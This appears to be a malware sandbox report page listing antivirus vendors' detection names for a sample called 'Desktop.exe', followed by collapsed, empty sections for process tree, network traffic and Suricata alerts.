Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Riskware ( 0040eff71 )
Alibaba	Backdoor:MSIL/LightStone.80427b74
K7GW	Riskware ( 0040eff71 )
CrowdStrike	win/malicious_confidence_90% (W)
Arcabit	Trojan.Generic.D238E8E8
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Generik.NCZVMOZ
APEX	Malicious
Paloalto	generic.ml
Kaspersky	Backdoor.MSIL.LightStone.drj
BitDefender	Trojan.GenericKD.37284072
NANO-Antivirus	Virus.Win32.Gen-Crypt.ccnc
Avast	Win32:Malware-gen
Ad-Aware	Trojan.GenericKD.37284072
Sophos	Mal/Generic-R + Mal/FakeMS-X
DrWeb	Trojan.Siggen14.43856
TrendMicro	TROJ_GEN.R002C0RGM21
McAfee-GW-Edition	BehavesLike.Win32.Generic.wc
MaxSecure	Trojan.Malware.300983.susgen
FireEye	Generic.mg.f31199c1fccb1fe6
Emsisoft	Trojan.GenericKD.37284072 (B)
Ikarus	Trojan.SuspectCRC
Webroot	W32.Trojan.GenKD
Avira	HEUR/AGEN.1135447
MAX	malware (ai score=100)
Kingsoft	Win32.Heur.KVMH008.a.(kcloud)
Gridinsoft	Trojan.Heur!.032100A1
Microsoft	Trojan:Win32/Spy.BYF!MTB
ZoneAlarm	Backdoor.MSIL.LightStone.drj
GData	Trojan.GenericKD.37284072
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Generic.R433010
McAfee	Artemis!F31199C1FCCB
VBA32	BScope.TrojanDownloader.MSIL.Pasta
Malwarebytes	Trojan.Crypt
TrendMicro-HouseCall	TROJ_GEN.R002C0RGM21
Rising	Trojan.Generic@ML.99 (RDML:J+cwC0zvb3Rk3uOeBbXyNQ)
SentinelOne	Static AI - Malicious PE
eGambit	Unsafe.AI_Score_100%
Fortinet	W32/PossibleThreat
BitDefenderTheta	AI:Packer.E4FAF2611F
AVG	Win32:Malware-gen
Cybereason	malicious.1fccb1

Desktop.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All